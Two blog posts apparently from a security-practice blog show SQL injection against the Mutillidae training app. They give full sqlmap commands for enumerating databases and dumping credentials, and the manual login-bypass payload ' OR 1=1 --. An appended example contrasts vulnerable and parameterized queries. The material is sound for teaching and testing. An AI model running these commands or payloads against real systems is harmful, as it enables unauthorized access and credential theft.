
Wednesday, 13 January 2016

SQLMAP - Database takeover tool - the old skool way

Hacking mysql database via SQLMAP

Here I will demonstrate a SQL injection attack using SQLMAP, and I will use it to bypass a login.

Tools: SQLMAP / Burp Suite
Browser: Iceweasel
Web App: Mutillidae v2.6.30
OS: Kali Linux

First:
  • configure the browser to use a proxy (I'm using Burp Suite), then head to
  • http://192.168.0.9/mutillidae/index.php?page=login.php
  • enter some data in the username & password fields
  • in Burp, review the captured POST request; we need some information from it


Using the capture above we can now begin constructing our sqlmap command.

sqlmap --url="ENTER_FULL_URL_HERE" (this is the full URL of the login page, i.e. the host and the path from the POST line shown above)

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php"

The next part of the command is
--data="ENTER_DATA_HERE" (this is the body of the POST request)

--data="username=admin&password=admcdicndsjcn&login-php-submit-button=Login"

and finally
--banner (retrieves the database banner)

The sqlmap command is now complete. Our full sqlmap command is:

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" --banner 

(a truncated video displaying the outcome of the injection: the retrieved banner)


BYPASSING A LOGIN USING SQLMAP 


So we are 100% certain that the MySQL database is vulnerable to SQL injection; now we will escalate our attack and see what credentials we can grab.

We need to bypass the login presented to us on the login page. We now know the application is vulnerable to SQL injection, so we will mount an attack to verify this. We already have the main command for the attack:

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login"  

We simply need to extend the command slightly. The first new switch/parameter we add is

--dbs (this lists the available databases)

There were 6 databases listed.

From experience I know that the database we need to attack is named nowasp, so we can further amend our sqlmap command:

remove --dbs (as we now know the name of the database we need to attack)
add
-D nowasp
and add
--tables (the tables switch lists all tables within the database nowasp)

Again, experience tells me I want to retrieve the info held within the accounts table,
so we can further amend our command:
remove
--tables
add
-T accounts
add
--columns (gives us a list of columns to select info from)
Bingo, we now have a full list of all the columns we want to retrieve; in this case I want
firstname
lastname
password
username
We are now ready to complete our sqlmap command, so we
remove
--columns
and add
-C firstname,lastname,password,username
We need to dump the credentials retrieved so we can see them, so we add the --dump switch. Our full sqlmap injection command is:

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" -D nowasp -T accounts -C firstname,lastname,password,username --dump

We have successfully retrieved all usernames & passwords for the login to the system, so we no longer need a login of our own.


Friday, 8 January 2016

OWASP A1 Injection

sqli extract user info low security

Web app: Mutillidae
Browser: Iceweasel

In this post we will attempt to extract user data from a database using SQL injection.


To test for a SQLi vulnerability I simply add a single quote into the Name field.
This results in information leakage which aids my attack and also exposes many other vulnerabilities; however, we are solely concerned with obtaining user info. Here's the error message:


This tells me the database is MySQL, and crucially it also shows the ACTUAL SQL query performed. This alone tells me that the Name parameter/field is likely vulnerable to SQL injection; now we simply need to complete the SQL statement to give us what we want.
So we extend our single quote with
OR 1=1
1 is ALWAYS equal to 1, so this makes the WHERE condition true for every row.
--
We don't have the password, so -- comments out the rest of the query, including the password check. Our full SQLi payload is now
' OR 1=1 -- <space after comments>
To achieve this we simply type the SQL payload in the Name field,
and as shown in the video all USERNAMES & PASSWORDS have been retrieved.
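To show why that payload works and what closes the hole, here is an added example (not from the original post): a constructed in-memory copy of the accounts table, the string-concatenated lookup of the kind the error message exposed, and the same lookup with bound parameters. SQLite stands in for MySQL, the sample rows are made up, and the column names follow the -C list from the first post.

```python
import sqlite3

# Constructed sample rows standing in for Mutillidae's accounts table
# (SQLite in memory here; the target on the page is MySQL).
ROWS = [
    ("admin", "s3cret", "System", "Administrator"),
    ("alice", "wonderland", "Alice", "Liddell"),
]
# The payload from the post. In MySQL the space after -- is required for it
# to be treated as a comment; SQLite accepts it either way.
PAYLOAD = "' OR 1=1 -- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, "
                 "firstname TEXT, lastname TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, name, password):
    # String concatenation: the input becomes part of the SQL text, so the quote
    # closes the literal, OR 1=1 matches every row and -- drops the password check.
    sql = ("SELECT username, password FROM accounts WHERE username='" + name
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name, password):
    # Bound parameters: the whole string is compared as a value and never
    # parsed as SQL, so the same payload simply matches no account.
    sql = "SELECT username, password FROM accounts WHERE username=? AND password=?"
    return conn.execute(sql, (name, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated query:", lookup_vulnerable(db, PAYLOAD, "anything"))
    print("bound parameters:  ", lookup_parameterized(db, PAYLOAD, "anything"))
```

Run as is: the concatenated query returns every account for the payload, while the parameterized one returns nothing and still matches a genuine username/password pair.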